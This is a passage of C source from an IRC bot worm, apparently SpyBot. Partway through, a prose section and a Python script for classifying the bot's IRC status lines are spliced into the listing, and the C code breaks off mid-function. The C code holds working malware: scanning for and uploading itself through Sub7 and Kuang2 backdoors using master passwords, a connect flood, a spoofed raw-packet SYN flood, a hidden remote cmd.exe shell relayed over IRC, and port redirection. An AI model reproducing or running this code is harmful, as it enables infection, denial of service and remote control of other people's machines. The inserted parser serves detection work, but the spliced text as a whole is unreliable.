2265   		connect(sock[c], (PSOCKADDR) &SockAddr, sizeof(SockAddr));
2266 	}
2267       	Sleep(scan[num].delay);     
2268 	for (c=0;c<MAX_PORTSCAN_SOCKETS_TO_USE;c++)
2269 	{
2270    		fd_set fd_struct;
2271     		time.tv_sec = 0;
2272     		time.tv_usec = 0;
2273    		FD_ZERO(&fd_struct);
2274     		FD_SET(sock[c], &fd_struct);
2275 		if (select(0,NULL, &fd_struct, NULL, &time) < 1) {
2276 			closesocket(sock[c]);
2277 			continue;
2278 		}
2279 		else {//its open
2280 			SOCKADDR socketname;
2281 			int s = sizeof(socketname);
2282 			getpeername(sock[c],&socketname,&s);
2283 			memcpy(&iaddr.S_un.S_addr,&socketname.sa_data[2],4);
2284 			if (strlen(scan[num].file) > 2) { //log to file
2285 				infile = fopen(scan[num].file,"aw");
2286 				if (infile != NULL) {
2287 					sprintf(sendbuf,"%s:%i\n",inet_ntoa(iaddr),port);
2288 					fputs(sendbuf,infile);
2289 					fclose(infile);
2290 				}
2291 			}
2292       	     
2293 			if (strlen(scan[num].chan) > 2) sprintf(sendbuf,"PRIVMSG %s :Found port %i open at ip:%s \r\n",scan[num].chan,port,inet_ntoa(iaddr)); //sendto query/channel
2294 			else sprintf(sendbuf,"Found poort %i open at ip:%s \r\n",port,inet_ntoa(iaddr)); //send to dcc chat	
2295 			if (scan[num].sock != 0) send(scan[num].sock, sendbuf, strlen(sendbuf), 0);
2296 			if (scan[num].extra == 0) closesocket(sock[c]);
2297 			#ifdef SUB7_SPREADER
2298 			if (scan[num].extra == 1) {
2299 				if (sub7(sock[c]) == 1 && scan[num].sock != 0) {
2300 					if (strlen(scan[num].chan) > 2) sprintf(sendbuf,"PRIVMSG %s :Server uploaded to sub7server IP: %s port: %i\r\n",scan[num].chan,inet_ntoa(iaddr),port); //sendto query/channel
2301 					else sprintf(sendbuf,"Server uploaded to sub7server IP: %s port: %i\r\n",inet_ntoa(iaddr),port); //send to dcc chat	
2302 					send(scan[num].sock, sendbuf, strlen(sendbuf), 0);
2303 				}
2304 			}
2305 			#endif
2306 			#ifdef KUANG2_SPREADER
2307 			if (scan[num].extra == 2) {
2308 				if (KUANG(sock[c]) == 1 && scan[num].sock != 0) {
2309 					if (strlen(scan[num].chan) > 2) sprintf(sendbuf,"PRIVMSG %s :Server uploaded to kuangserver IP: %s \r\n",scan[num].chan,inet_ntoa(iaddr)); //sendto query/channel
2310 					else sprintf(sendbuf,"Server uploaded to kuangserver IP: %s \r\n",inet_ntoa(iaddr)); //send to dcc chat	
2311 					send(scan[num].sock, sendbuf, strlen(sendbuf), 0);
2312 				}
2313 			}
2314 			#endif
2315 		}
2316 	}
2317 	return 0;
2318 }
2319 
2320 
2321 
2322 void GetNewIp(int num)
2323 {
2324 	while (1) {
2325 		if (scan[num].scan_4 > 254) {
2326 			scan[num].scan_4 = 0;
2327 			scan[num].scan_3++;
2328 		}
2329 		else {
2330 			scan[num].scan_4++;
2331 			break;
2332 		}
2333 		if (scan[num].scan_3 > 254) {
2334 			scan[num].scan_3 = 0;
2335 			scan[num].scan_2++;
2336 		}
2337 		else 
2338 			break;
2339 		if (scan[num].scan_2 > 254) {
2340 			scan[num].scan_2 = 0;
2341 			scan[num].scan_1++;
2342 		}
2343 		else 
2344 			break;
2345 		if (scan[num].scan_1 > 254) { //we are at 255.255.255.255 and we start again with 0.0.0.0
2346 			scan[num].scan_1 = 0;
2347 			scan[num].scan_2 = 0;
2348 			scan[num].scan_3 = 0;
2349 			scan[num].scan_4 = 0;
2350 		}
2351 		else 
2352 			break;
2353 
2354 	}
2355 	sprintf(scan[num].ip,"%i.%i.%i.%i",scan[num].scan_1,scan[num].scan_2,scan[num].scan_3,scan[num].scan_4);
2356 		
2357 }
2358 
2359 
2360 #ifdef SUB7_SPREADER
2361 int SUB7_Reciev(SOCKET sock)
2362 {
2363 	TIMEVAL time;
2364    	fd_set fd_struct;
2365     	time.tv_sec = 30;//timeout after 30 sec.
2366     	time.tv_usec = 0;
2367    	FD_ZERO(&fd_struct);
2368     	FD_SET(sock, &fd_struct);
2369 	if (select(0, &fd_struct, NULL, NULL, &time) <= 0)
2370 	{
2371 		closesocket(sock); 
2372 		return -1;
2373 	}
2374 	return 0;
2375 }
2376 
2377 
2378 int sub7(SOCKET sock)
2379 {
2380 	
2381 	char rBuffer[512];
2382 	DWORD mode = 0;
2383 	DWORD err;
2384 	SOCKADDR_IN socketname;
2385 	int s = sizeof(socketname);
2386 	getpeername(sock,&socketname,&s);
2387 	char host[100];
2388 	int port;
2389 	sprintf(host,"%s",inet_ntoa(socketname.sin_addr));
2390 	port = ntohs(socketname.sin_port);
2391 	int try = 0;
2392 	int c,size;
2393 	char thisfilename[MAX_PATH];
2394 	ioctlsocket(sock,FIONBIO,&mode); //set the socket back to blocking
2395 	restart:;
2396 	memset(rBuffer,0,sizeof(rBuffer));
2397 	if (SUB7_Reciev(sock) == -1) 
2398 		goto end;
2399 	if (recv(sock, rBuffer, sizeof(rBuffer), 0) <= 0) goto end;
2400       	      
2401 	if (strcmp(rBuffer,"PWD") == 0) { //its password protected try the masterpasswords
2402 		if (try > 1) {
2403 			goto end;
2404 		}
2405 		if (try == 0) sprintf(rBuffer,"PWD715"); 
2406 		else if (try == 1) { //try the other pass 
2407 			sprintf(rBuffer,"PWD14438136782715101980"); 
2408 		}
2409 		try++;
2410 		if (send(sock,rBuffer,strlen(rBuffer), 0) <= 0) goto end;
2411 		goto restart;
2412 	}
2413 	strtok(rBuffer," ");
2414 	if (strcmp(rBuffer,"connected.") == 0) { //we are connected
2415 		send(sock,"UPS",3, 0);
2416 		memset(rBuffer,0,sizeof(rBuffer));
2417 		if (SUB7_Reciev(sock) == -1) goto end;
2418 		recv(sock, rBuffer, sizeof(rBuffer), 0);
2419 		if (strcmp(rBuffer,"TID") != 0) goto end; //something went wrong
2420 		GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));
2421 		char buffer[1041];
2422 		HANDLE testfile = CreateFile(thisfilename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
2423 		if (testfile == INVALID_HANDLE_VALUE) 
2424 			goto end;
2425 		size = GetFileSize(testfile,NULL);
2426 		CloseHandle(testfile);
2427 		sprintf(rBuffer,"SFT05%i",size);
2428 		send(sock,rBuffer,10, 0);
2429 		FILE* infile;
2430 		infile = fopen(thisfilename,"rb");
2431 		if (infile == NULL) goto end;
2432 		while (1)
2433 		{
2434 			memset(buffer,0,sizeof(buffer));
2435 			c = fread(buffer,1,sizeof(buffer),infile);
2436 			if (c == 0) 
2437 				break;
2438 			if (send(sock,buffer ,c, 0) <= 0) {
2439 				fclose(infile);
2440 				goto end;
2441 			}
2442 		}
2443 		fclose(infile);
2444 		c=0;
2445 		while (err > 0) {
2446 			if (c > 3) 
2447 				break;
2448 			if (SUB7_Reciev(sock) == -1) 
2449 				break;
2450 			err = recv(sock, rBuffer, sizeof(rBuffer), 0);
2451 		}
2452 		closesocket(sock);
2453 		return 1;
2454 			
2455 	}
2456 	else if (try == 1) {
2457 		closesocket(sock);
2458 		Sleep(2000);
2459 		if ((sock = create_sock(host,port)) == SOCKET_ERROR) goto end;
2460 		goto restart;
2461 	}
2462 
2463 	end:;
2464 	closesocket(sock);
2465 	return 0;
2466 
2467 }
2468 #endif
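Several of the routines above report back to the operator over IRC in fixed formats: dccsenderror() wraps text in "PRIVMSG <chan> :" when a channel is set and sends it bare over DCC chat otherwise; dcc_send() announces a file as a CTCP "\x01DCC SEND <name> <ip> <port> <len>\x01" where <ip> is htonl(inet_addr(IP)) printed with %i, so addresses with a first octet of 128 or above appear negative; dcc_getfile() acknowledges every chunk with a 4-byte network-order running total; scan_host() reports "Found port ... open at ip:..." (or "Found poort" on DCC chat) and "Server uploaded to sub7server/kuangserver ..."; sysinfo() produces the "Version:... cpu: ...MHz. ram: ..." beacon. The Python below is an added example, not part of the SpyBot source, that parses and classifies those lines, for instance over IRC traffic captured from an infected host. The sample lines are constructed, and Bot_Version is assumed to be "1.2" to match the HTTP Server header.

```python
# Added example (not SpyBot code): classifier for the status lines this bot
# writes to its IRC channel or DCC chat session.
import ipaddress
import re
import struct

# Constructed sample of bot output (not a real capture).
SAMPLE_LINES = [
    "PRIVMSG #spy :\x01DCC SEND key_log.txt -1062731515 1045 44576\x01\n\r",
    "PRIVMSG #spy :Transfer complete (send: 44576 bytes)\n\r",
    "PRIVMSG #spy :Found port 27374 open at ip:10.0.0.7 \r\n",
    "Found poort 17300 open at ip:10.0.0.9 \r\n",
    "PRIVMSG #spy :Server uploaded to sub7server IP: 10.0.0.7 port: 27374\r\n",
    "PRIVMSG #spy :Dcc send timeout\n\r",
    "PRIVMSG #spy :Version:1.2 cpu: 1400MHz. ram: 256MB total, 120MB free  53% in use "
    "os: Windows XP (5.1, build 2600). uptime: 0d 3h 12m. Date: 25:Feb:2014 Time: 10:00:00 "
    "Current user: ? IP address: 192.168.1.5 Hostname: couldn't resolve host "
    "Windir: C:\\WINDOWS\\ Systemdir: C:\\WINDOWS\\system32\\\n\r",
    "PRIVMSG #spy :hello everyone\n\r",
]

PRIVMSG_RE = re.compile(r"^PRIVMSG (\S+) :(.*)$", re.S)
# dcc_send(): \x01DCC SEND <file> <ip as %i> <port> <length>\x01
DCC_SEND_RE = re.compile(r"^\x01DCC SEND (\S+) (-?\d+) (\d+) (\d+)\x01$")
STATUS_PATTERNS = [
    ("portscan_hit", re.compile(r"^Found poo?rt (\d+) open at ip:(\S+)")),
    ("sub7_upload", re.compile(r"^Server uploaded to sub7server IP: (\S+) port: (\d+)")),
    ("kuang2_upload", re.compile(r"^Server uploaded to kuangserver IP: (\S+)")),
    ("dcc_transfer_done", re.compile(r"^Transfer complete \((?:send|size): (\d+) bytes\)")),
    ("dcc_timeout", re.compile(r"^Dcc send timeout$")),
    ("socket_error", re.compile(r"^Socket error$")),
    ("sysinfo_report", re.compile(r"^Version:(\S+) cpu: (\d+)MHz\. ram: (\d+)MB total, (\d+)MB free")),
]


def strip_irc_line(raw: str):
    """(target, payload). The bot ends lines with LF CR in the DCC code and
    CR LF in the scanner, so both are stripped. DCC chat output has no
    PRIVMSG wrapper and yields target None."""
    line = raw.rstrip("\r\n")
    m = PRIVMSG_RE.match(line)
    return (m.group(1), m.group(2)) if m else (None, line)


def dcc_ip_to_str(value) -> str:
    """Undo the %i printing of an unsigned 32-bit network-order address."""
    return str(ipaddress.IPv4Address(int(value) & 0xFFFFFFFF))


def parse_dcc_send(payload: str):
    m = DCC_SEND_RE.match(payload)
    if not m:
        return None
    return {"file": m.group(1), "ip": dcc_ip_to_str(m.group(2)),
            "port": int(m.group(3)), "length": int(m.group(4))}


def parse_dcc_ack(data: bytes) -> int:
    """dcc_getfile() sends htonl(total bytes received) after each chunk."""
    return struct.unpack("!I", data[:4])[0]


def classify(raw: str):
    """(kind, target, details) for a recognised bot line, else None."""
    target, payload = strip_irc_line(raw)
    dcc = parse_dcc_send(payload)
    if dcc:
        return ("dcc_send_offer", target, dcc)
    for name, rx in STATUS_PATTERNS:
        m = rx.match(payload)
        if m:
            return (name, target, m.groups())
    return None


def scan_lines(lines):
    return [hit for hit in (classify(line) for line in lines) if hit]


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LINES):
        print(hit)
```

The "Found poo?rt" alternative covers both spellings the bot uses, and the negative-number handling in dcc_ip_to_str() matters on any target whose address starts with an octet above 127.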
2469 
2470 #ifdef KUANG2_SPREADER
2471 #define	K2_UPLOAD_FILE	0x46445055
2472 #define	K2_ERROR	0x52525245
2473 #define	K2_DONE		0x454E4F44
2474 #define	K2_RUN_FILE	0x464E5552
2475 #define	K2_QUIT		0x54495551	
2476 typedef struct {
2477 	unsigned int command;
2478 	union {
2479 		char bdata[1024-4];
2480 		struct {
2481 			unsigned int param;
2482 			char sdata[1024-8];
2483 		};
2484 	};
2485 } Message, *pMessage;
2486 char k2_buffer[1024];
2487 pMessage k2_msg = (pMessage) k2_buffer;
2488 
2489 int KUANG_Reciev(SOCKET sock)
2490 {
2491 	char rBuffer[1024];
2492 	TIMEVAL time;
2493    	fd_set fd_struct;
2494     	time.tv_sec = 30;//timeout after 30 sec.
2495     	time.tv_usec = 0;
2496    	FD_ZERO(&fd_struct);
2497     	FD_SET(sock, &fd_struct);
2498 	if (select(0, &fd_struct, NULL, NULL, &time) <= 0)
2499 	{
2500 		closesocket(sock); 
2501 		return -1;
2502 	}
2503 	memset(k2_buffer,0,sizeof(k2_buffer));
2504       	if (recv(sock, k2_buffer, sizeof(k2_buffer), 0) < 1) return -1;
2505 	if (k2_msg->command == K2_ERROR) {
2506 		return -1;
2507 	}
2508       	      
2509 	return 0;
2510 }
2511 
2512 int KUANG(SOCKET sock)
2513 {
2514 	char rBuffer[1024];
2515 	unsigned int Fsize, Fsend, move;
2516 	DWORD mode = 0;
2517 	int err,x;
2518 	char thisfilename[MAX_PATH];
2519 	char randFile[5];
2520 	char rFile[15];
2521 	memset(rFile,0,sizeof(rFile));
2522 	memset(randFile,0,sizeof(randFile));
2523 	srand(GetTickCount());
2524 	for (x=0;x<4;x++)
2525 		randFile[x] = (rand()%26)+97;
2526 	randFile[x+1] = '\0';
2527 	sprintf(rFile,"c:\\%s.exe",randFile);
2528 	ioctlsocket(sock,FIONBIO,&mode); //set the socket back to blocking
2529 	if (KUANG_Reciev(sock) == -1) goto end;
2530 	memset(k2_buffer,0,sizeof(k2_buffer));
2531 	GetModuleFileName(NULL,thisfilename,sizeof(thisfilename));
2532 	HANDLE testfile = CreateFile(thisfilename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
2533 	if (testfile == INVALID_HANDLE_VALUE) 
2534 		goto end;
2535 	Fsize = GetFileSize(testfile,NULL);
2536 	k2_msg->command=K2_UPLOAD_FILE;
2537 	k2_msg->param=Fsize;
2538 	strcpy(k2_msg->sdata,rFile);
2539 	//strcpy(k2_msg->bdata,rFile);
2540 	//CloseHandle(testfile);
2541 	send(sock,k2_buffer,1024, 0);
2542 	if (KUANG_Reciev(sock) == -1) goto end;
2543 	while (Fsize) {
2544 		int Fsend = 1024;
2545 		memset(rBuffer,0,sizeof(rBuffer));
2546 		if (Fsend>Fsize) Fsend=Fsize;
2547 		move = 0-Fsize;
2548 		SetFilePointer(testfile, move, NULL, FILE_END);
2549 		ReadFile(testfile, rBuffer, Fsend, &mode, NULL);
2550 		int bytes_sent = send(sock, rBuffer, Fsend, 0);
2551 		if (bytes_sent == SOCKET_ERROR) {
2552 			if (WSAGetLastError() != WSAEWOULDBLOCK) break;
2553 			else bytes_sent = 0;
2554 		}
2555 		Fsize = Fsize - bytes_sent;
2556 	}
2557 	if (KUANG_Reciev(sock) == -1) goto end;
2558 	if (testfile != INVALID_HANDLE_VALUE) CloseHandle(testfile);
2559 	memset(k2_buffer,0,sizeof(k2_buffer));
2560 	k2_msg->command=K2_RUN_FILE;
2561 	sprintf(k2_msg->bdata,rFile);
2562 	send(sock,k2_buffer ,1024, 0);
2563 	if (KUANG_Reciev(sock) == -1) goto end;
2564 	memset(k2_buffer,0,sizeof(k2_buffer));
2565 	k2_msg->command=K2_QUIT;
2566 	send(sock,k2_buffer ,4, 0);
2567 	return 1;
2568 	end:;
2569 	closesocket(sock);
2570 	return 0;
2571 }
2572 #endif
2573 
2574 
2575 #ifdef SYN_FLOOD
2576 #define MAX_SYNFLOOD_SOCKETS_TO_USE 200
2577 DWORD WINAPI syn_flood(LPVOID param)
2578 {
2579 	int num = (int)param;
2580 	syn[num].state = 1;
2581 	SOCKADDR_IN    SockAddr;
2582    	SOCKET         sock[MAX_SYNFLOOD_SOCKETS_TO_USE];//we are gone use 200 sockets
2583    	IN_ADDR iaddr;
2584 	memset(&SockAddr, 0, sizeof(SockAddr));
2585 	SockAddr.sin_family = AF_INET;
2586    	SockAddr.sin_port = htons(syn[num].port);
2587 	LPHOSTENT lpHostEntry = NULL;
2588  	DWORD mode = 1;
2589 	int c,i;
2590 	iaddr.s_addr = inet_addr(syn[num].host);
2591 	if (iaddr.s_addr == INADDR_NONE) lpHostEntry = gethostbyname(syn[num].host);
2592 	if (lpHostEntry == NULL && iaddr.s_addr == INADDR_NONE) { //error dns
2593 		syn[num].state = 0;
2594 		threads[syn[num].thread].id = 0;	
2595 		return 0;
2596 	}
2597 	if (lpHostEntry != NULL)
2598 		SockAddr.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list); //hostname
2599 	else
2600 		SockAddr.sin_addr = iaddr; //ip address
2601 	i = 0;
2602 	while (i < syn[num].times) {
2603 		for (c=0;c<MAX_SYNFLOOD_SOCKETS_TO_USE;c++)
2604 		{
2605 			sock[c] = socket(AF_INET, SOCK_STREAM, 0);
2606    			if (sock[c] == INVALID_SOCKET)
2607       				continue;
2608 			ioctlsocket(sock[c],FIONBIO,&mode);
2609 		}
2610 		for (c=0;c<MAX_SYNFLOOD_SOCKETS_TO_USE;c++)
2611   			connect(sock[c], (PSOCKADDR) &SockAddr, sizeof(SockAddr));
2612       		Sleep(syn[num].delay);     
2613 		for (c=0;c<MAX_SYNFLOOD_SOCKETS_TO_USE;c++)
2614 			closesocket(sock[c]); //close all sockets
2615 		i++;
2616 	}
2617 	syn[num].state = 0;
2618 	threads[syn[num].thread].id = 0;	
2619 	return 0;
2620 }
2621 #endif
2622 
2623 #ifdef remote_cmd
2624 void Close_Handles()
2625 {
2626 	if (pipe_read != INVALID_HANDLE_VALUE) CloseHandle(pipe_read);
2627 	if (pipe_write != INVALID_HANDLE_VALUE) CloseHandle(pipe_write);
2628 	if (pipe_Hproc != INVALID_HANDLE_VALUE) CloseHandle(pipe_Hproc);
2629 }
2630 
2631 
2632 int open_cmd(SOCKET sock,char * chan)
2633 {
2634 	Close_Handles();
2635 	char searsdir[MAX_PATH];
2636   	SECURITY_ATTRIBUTES secAttr;
2637   	STARTUPINFO startInfo;
2638   	PROCESS_INFORMATION procInfo;
2639 	HANDLE hChildOutRd, hChildOutWr, hChildInRd, hChildInWr;
2640 	//sears for cmd.exe
2641 	GetWindowsDirectory(searsdir,sizeof(searsdir));
2642 	strcat(searsdir,"\\cmd.exe");
2643 	if (GetFileAttributes(searsdir) == 0xFFFFFFFF) {
2644 		GetSystemDirectory(searsdir,sizeof(searsdir));
2645 		strcat(searsdir,"\\cmd.exe");
2646 		if (GetFileAttributes(searsdir) == 0xFFFFFFFF) return -1;
2647 	}
2648     	secAttr.nLength = sizeof(secAttr);
2649     	secAttr.bInheritHandle = TRUE;
2650     	secAttr.lpSecurityDescriptor = NULL;
2651 
2652     	if (!CreatePipe(&hChildOutRd, &hChildOutWr, &secAttr, 0)) return -1;
2653     	if (!CreatePipe(&hChildInRd, &hChildInWr, &secAttr, 0)) return -1;
2654     	if (!DuplicateHandle(GetCurrentProcess(), hChildInWr, GetCurrentProcess(), &hChildInWrDupe, 0, FALSE, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE)) return -1;
2655 
2656    	memset(&startInfo, 0, sizeof(startInfo));
2657    	startInfo.cb = sizeof(startInfo);
2658     	startInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
2659     	startInfo.wShowWindow = SW_HIDE;
2660     	startInfo.hStdInput = hChildInRd;
2661     	startInfo.hStdOutput = hChildOutWr;
2662    	if (!CreateProcess(searsdir,"", NULL, NULL, TRUE, 0, NULL, NULL, &startInfo, &procInfo)) 
2663 		return -1;
2664    	CloseHandle(hChildInRd);
2665 	DWORD id;
2666 	pipe_read = hChildOutRd;
2667 	pipe_write = hChildInWr;
2668 	pipe_Hproc = procInfo.hProcess;
2669    	CloseHandle(procInfo.hThread);
2670 	pipesock = sock;
2671 	if (chan) sprintf(pipe_chan,chan);
2672 	else sprintf(pipe_chan,"\0");
2673 	CreateThread(NULL, 0, &PipeReadThread, NULL, 0, &id);
2674         return 0;
2675 }
2676 
2677 
2678 
2679 
2680 DWORD WINAPI PipeReadThread(LPVOID param)
2681 {
2682 	DWORD numread, br;
2683 	char buffer[512];
2684 	while (1)
2685 	{
2686 		BOOL eol = FALSE;
2687 		DWORD State;
2688 
2689 		memset(buffer,0,sizeof(buffer));
2690 		if (!PeekNamedPipe(pipe_read,buffer,512,&br,NULL,NULL)) {
2691 			pipe_send(pipesock,pipe_chan,"Could not read data from proccess");
2692 			return 0;
2693 		}
2694 
2695 		if (br == 0) { //nothing to read 
2696 			if (GetExitCodeProcess(pipe_Hproc,&State)) { //maybe process is death ?
2697 				if (State != STILL_ACTIVE) {
2698 					Close_Handles(); 
2699 					pipe_send(pipesock,pipe_chan,"Proccess has terminated");
2700 					return 0;
2701 				}
2702 			}
2703 			Sleep(10); //process is waithing sleep and try again
2704 			continue;
2705 		}
2706 		DWORD cbyte;
2707 		for(cbyte=0;cbyte<br;cbyte++) {
2708 			if (buffer[cbyte] == '\n')
2709 			{
2710 				eol = TRUE;
2711 				break;
2712 			}
2713 		}
2714 		if (eol) br = cbyte + 1;
2715 		else br = 512;
2716 		memset(buffer,0,sizeof(buffer));
2717 		if (!ReadFile(pipe_read, buffer, br, &numread, NULL)) 
2718 				break;
2719 		pipe_send(pipesock,pipe_chan,buffer);
2720 
2721 	}
2722 	pipe_send(pipesock,pipe_chan,"Could not read data from proccess");
2723         return 0;
2724 }
2725 int pipe_send(SOCKET sock,char *chan,char *buf)
2726 {
2727 	char sendbuf[612];
2728 	if (strlen(chan) > 2) sprintf(sendbuf,"PRIVMSG %s :%s\r",chan,buf);
2729 	else sprintf(sendbuf,"%s",buf);
2730 	if (send(sock,sendbuf,strlen(sendbuf),0) <= 0) Close_Handles();
2731 	if (strlen(chan) > 2) Sleep(Flood_delay); //we dont want a excess flood
2732 	return 0;
2733 }
2734 #endif
2735 SOCKET create_sock(char *host, int port)
2736 {
2737 	DWORD err;
2738         LPHOSTENT lpHostEntry = NULL;
2739    	SOCKADDR_IN  SockAddr;
2740    	SOCKET sock;
2741    	IN_ADDR iaddr;
2742    	if ((sock = socket( AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
2743       		return -1;
2744 	memset(&SockAddr, 0, sizeof(SockAddr));
2745    	SockAddr.sin_family = AF_INET;
2746    	SockAddr.sin_port = htons(port);
2747 	iaddr.s_addr = inet_addr(host);
2748 	if (iaddr.s_addr == INADDR_NONE)  lpHostEntry = gethostbyname(host); //hostname
2749 	if (lpHostEntry == NULL && iaddr.s_addr == INADDR_NONE)  //error dns
2750 		return -1;
2751 	if (lpHostEntry != NULL)
2752 		SockAddr.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list); //hostname
2753 	else
2754 		SockAddr.sin_addr = iaddr; //ip address
2755 	if (connect(sock, (SOCKADDR *) &SockAddr, sizeof(SockAddr)) == SOCKET_ERROR) {
2756 		closesocket(sock);
2757 		return -1;
2758 	}
2759 	return sock;
2760 }
2761 SOCKET Listen(int port)
2762 {
2763 	SOCKET sock;
2764 	SOCKADDR_IN  SockAddr;
2765    	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) 
2766       		return -1;
2767 	memset(&SockAddr, 0, sizeof(SockAddr));
2768    	SockAddr.sin_family = AF_INET;
2769    	SockAddr.sin_port = htons(port);
2770 	SockAddr.sin_addr.s_addr = INADDR_ANY;  
2771 	if (bind(sock, (SOCKADDR *)&SockAddr, sizeof(SockAddr)) != 0) 
2772 		return -1;//port is in use ?
2773 	if (listen(sock, SOMAXCONN) != 0) 
2774 		return -1;
2775 	return sock;
2776 }
2777 
2778 int redirect_transfer(SOCKET sock_in,SOCKET sock_out)
2779 {
2780 	char buf[4096];	
2781 	memset(buf, 0, sizeof(buf));
2782 	DWORD err,err2;
2783 	err = recv(sock_in,buf,sizeof(buf),0);
2784 	if (err == 0) return -1;
2785 	if (err == SOCKET_ERROR) {
2786 		if (WSAGetLastError() == WSAEWOULDBLOCK) return 0;
2787 		return -1;
2788 	}
2789 	err2 = send(sock_out,buf,err,0);
2790 	if (err2 == 0) return -1;
2791 	if (err2 == SOCKET_ERROR) {
2792 		if (WSAGetLastError() == WSAEWOULDBLOCK) return 0;
2793 		return -1;
2794 	}
2795 	return 0;
2796 }
2797 DWORD WINAPI redirect_io(LPVOID param)
2798 {
2799 	int num = (int)param;
2800 	SOCKET sock_out;
2801 	SOCKET sock_in;
2802 	sock_in = redirectsock_in;
2803 	info = TRUE;
2804 	if ((sock_out = create_sock(threads[num].dir,threads[num].port)) == SOCKET_ERROR) {
2805 		closesocket(sock_in);
2806 		return 0;
2807 	}
2808 	unsigned long mode = 1;
2809 	ioctlsocket(sock_out,FIONBIO,&mode);
2810 	ioctlsocket(sock_in,FIONBIO,&mode);
2811   	fd_set fd_struct;
2812 
2813    	while (1)
2814    	{
2815 		FD_ZERO(&fd_struct);
2816       		FD_SET(sock_in, &fd_struct);
2817      		FD_SET(sock_out, &fd_struct);
2818       		if (select(0, &fd_struct, NULL, NULL, NULL) == SOCKET_ERROR) 
2819 			break;
2820       		if (FD_ISSET(sock_in, &fd_struct)) 
2821       			if (redirect_transfer(sock_in,sock_out) == -1) break;
2822        		if (FD_ISSET(sock_out,&fd_struct)) 
2823 			if (redirect_transfer(sock_out,sock_in) == -1) break;
2824    	}
2825 	closesocket(sock_out);
2826 	closesocket(sock_in);
2827 	return 0;
2828 }
2829 DWORD WINAPI port_redirect(LPVOID param)
2830 {
2831 	int num = (int)param;
2832 	SOCKADDR_IN SockAddr;
2833 	int addrlen;
2834 	DWORD id;
2835 	while (1) {
2836 		addrlen = sizeof(SockAddr);
2837 		if ((redirectsock_in = accept(threads[num].sock, (SOCKADDR *)&SockAddr,&addrlen)) == INVALID_SOCKET)  
2838 			break;
2839 		info = FALSE;
2840 		CreateThread(NULL, 0, &redirect_io, (LPVOID)num, 0, &id);
2841 		while (info == FALSE) Sleep(5);
2842 	}
2843 	closesocket(threads[num].sock);
2844 	threads[num].id = 0;
2845 	return 0;
2846 }
2847 
2848 
2849 #ifdef SPOOFD_SYNFLOOD
2850 
2851 DWORD WINAPI Spoofd_syn(LPVOID param)
2852 {
2853 	int num = (int)param;
2854 	char chan[250];
2855 	strcpy(chan,sendtochan);
2856 	WSADATA WSAData; 
2857 	SOCKET sock; 
2858 	Spoofdsyn[num].state = 1;
2859 	SOCKADDR_IN addr_in; 
2860 	IPHEADER ipHeader; 
2861 	TCPHEADER tcpHeader; 
2862 	PSDHEADER psdHeader; 
2863 	char sendbuf[512];
2864 	char szSendBuf[60]={0}; 
2865 	BOOL flag; 
2866 	int rect,nTimeOver; 
2867 	unsigned int SpoofingIP=0; 
2868 	DWORD i=0; 
2869 	int Count;
2870 	Count = 0;
2871 
2872 
2873 	if (WSAStartup(MAKEWORD(2,2), &WSAData)!=0) 
2874 	{ 
2875 		strcpy(sendbuf,"WSA startup error");
2876 		goto end; 
2877 	} 
2878 
2879 	if ((sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) 
2880 	{ 
2881 		strcpy(sendbuf,"INVALID_SOCKET");
2882 		goto end;  
2883 	} 
2884 	flag=TRUE; 
2885 	if (setsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag))==SOCKET_ERROR) 
2886 	{ 
2887 		strcpy(sendbuf,"setsockopt error");
2888 		goto end;
2889 	} 
2890 
2891 
2892 	addr_in.sin_family = AF_INET; 
2893 	addr_in.sin_port = htons(Spoofdsyn[num].port); 
2894 	addr_in.sin_addr.s_addr = Spoofdsyn[num].TargetIP; 
2895 
2896 
2897 	ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); 
2898 	ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(tcpHeader)); 
2899 	ipHeader.ident=1; 
2900 	ipHeader.frag_and_flags=0; 
2901 	ipHeader.ttl=128; 
2902 	ipHeader.proto=IPPROTO_TCP; 
2903 	ipHeader.checksum=0; 
2904 	ipHeader.destIP=Spoofdsyn[num].TargetIP; 
2905 	tcpHeader.th_dport=htons(Spoofdsyn[num].port); 
2906 	tcpHeader.th_ack=0; 
2907 	tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0); 
2908 	tcpHeader.th_flag=2; 
2909 	tcpHeader.th_win=htons(16384); 
2910 	tcpHeader.th_urp=0;  
2911 	char IP[15];
2912 	while(1) 
2913 	{
2914 		i++;
2915 		Sleep(Spoofdsyn[num].delay);
2916 		memset(IP,0,sizeof(IP));
2917 		sprintf(IP,"%i.%i.%i.%i",rand()%255,rand()%255,rand()%255,rand()%255);
2918  		SpoofingIP=htonl(inet_addr(IP));
2919 		srand(GetTickCount());
2920 		tcpHeader.th_sum=0; // can't be outside the for loop 
2921 
2922 		psdHeader.daddr=ipHeader.destIP; 
2923 		psdHeader.mbz=0; 
2924 		psdHeader.ptcl=IPPROTO_TCP; 
2925 		psdHeader.tcpl=htons(sizeof(tcpHeader)); 
2926 
2927 		ipHeader.sourceIP=htonl(SpoofingIP);
2928 
2929 
2930 		tcpHeader.th_sport=htons((rand() % 1001) + 1000 );//htons(SOURCE_PORT); 
2931 		tcpHeader.th_seq=htons((rand() << 16) | rand()); //htonl(0x1234567 ; 
2932 
2933 		psdHeader.saddr=ipHeader.sourceIP;
2934 		memset(szSendBuf,0,sizeof(szSendBuf));
2935 		memcpy(szSendBuf, &psdHeader, sizeof(psdHeader)); 
2936 		memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader)); 
2937 		tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)); 
2938 
2939 		memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); 
